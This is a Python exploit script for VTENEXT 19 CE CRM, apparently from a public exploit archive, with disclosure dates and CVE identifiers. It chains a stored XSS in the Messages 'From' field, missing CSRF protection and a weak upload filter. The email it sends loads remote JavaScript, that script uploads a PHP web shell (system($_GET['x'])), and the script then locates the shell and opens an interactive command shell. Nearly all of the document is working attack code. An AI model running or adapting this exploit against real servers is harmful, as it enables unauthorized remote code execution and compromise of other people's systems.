VTENEXT 19 CE Remote Code Execution

`#!/usr/bin/python3  
  
# Exploit Title: VTENEXT 19 CE - Remote Code Execution  
# Google Dork: n/a  
# Date: 2020/09/09  
# Exploit Author: Marco Ruela  
# Vendor Homepage: https://www.vtenext.com/en/  
# Software Link: Vendor removed vulnerable version from sourceforge.net  
# Version: 19 CE  
# Tested on: Ubuntu 16.04  
# CVE : N/A  
  
# 2020/03/07 - Disclosed vulnerabilities to vendor  
# 2020/03/10 - Vendor committed to fix  
# 2020/09/09 - Public disclosure  
  
# This script should be easy enough to follow.  
# We string together the three vulnerabilities to get RCE.  
  
# XSS - The "From" field of the VTENEXT Messages module is vulnerable.  
# File Upload - File extensions are checked against a $upload_badext in the config file, .pht extensions are allowed and executable by default .  
# CSRF - No CSRF protections in place.  
  
# exploit.js needs to be hosted somewhere, IP's need to be replaced   
# check_csrf() should be changed based on your setup  
# run_shell() is a "nice to have"  
  
  
# content of exploit.js  
"""  
function insertImage() {  
var xhr = new XMLHttpRequest();  
xhr.open('POST','http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=',true);  
xhr.setRequestHeader('Content-type','multipart/form-data; boundary=---------------------------rekt');  
xhr.setRequestHeader('Content-Length', '248');  
xhr.setRequestHeader('Referer', 'http://172.16.233.146/vtenext19ce/index.php');  
xhr.withCredentials = true;  
var body = '-----------------------------rekt\nContent-Disposition: form-data; name="file_0"; filename="shell.pht"\nContent-Type: text/text\n\n<?php system($_GET[\'x\']); ?>\n\n-----------------------------rekt--';  
  
var aBody = new Uint8Array(body.length);  
for (var i = 0; i < aBody.length; i++)  
aBody[i] = body.charCodeAt(i);  
xhr.send(new Blob([aBody]));  
}  
  
insertImage();  
"""  
  
import smtplib  
import datetime  
import requests  
import os  
import time  
  
base_url = "http://192.168.226.168/vtenext19ce/"  
  
print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC")  
  
  
def build_url():  
d = datetime.datetime.today()  
year = str(d.year)  
month = str(d.strftime("%B"))  
week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1])  
tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/"  
return(tmp)  
  
def build_mail():  
_from = """'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'"""  
_to = "[email protected]"  
_subject = "Important!"  
_body = "While you're reading this, a file is being uploaded to this server."   
  
msg = "From: " + _from + "\n"  
msg += "To: " + _to + "\n"  
msg += "Subject: " + _subject + "\n\n"  
msg += _body  
return msg  
  
def send_mail():  
msg = build_mail()  
smtp_server = '192.168.226.167'  
smtp_port = 25  
  
sender = '[email protected]'  
receiver = '[email protected]'  
  
server = smtplib.SMTP(smtp_server, smtp_port)  
server.sendmail(sender, receiver, msg)  
  
def check_csrf():  
while True:  
is_there = os.popen('tail -n1 /var/log/apache2/access.log').read()  
  
if "200" in is_there and "/exploit.js" in is_there and base_url in is_there:  
print("[>] CSRF triggered")  
break  
else:  
time.sleep(0.5)  
continue  
  
  
def find_shell():  
print("[>] Locating shell")  
time.sleep(1)  
tmp1 = build_url()  
for i in range(1, 9999):  
url = tmp1 + str(i) + "_shell.pht"   
r = requests.get(url)  
if r.status_code == 200:  
print("[>] Found the shell")  
print("[-] Location: " + url)  
return url  
else:  
continue   
  
def run_shell(x):  
print("\n")  
while True:  
cmd = input("shell> ")  
if cmd == "exit":  
break  
else:  
url = x + "?x=" + cmd  
r = requests.get(url)  
print(r.text)  
  
  
print("[>] Sending email")  
send_mail()  
  
print("[-] Waiting for user to open mail")  
  
check_csrf()  
  
shell_location = find_shell()  
  
run_shell(shell_location)  
  
  
print("[!] Done!")  
  
`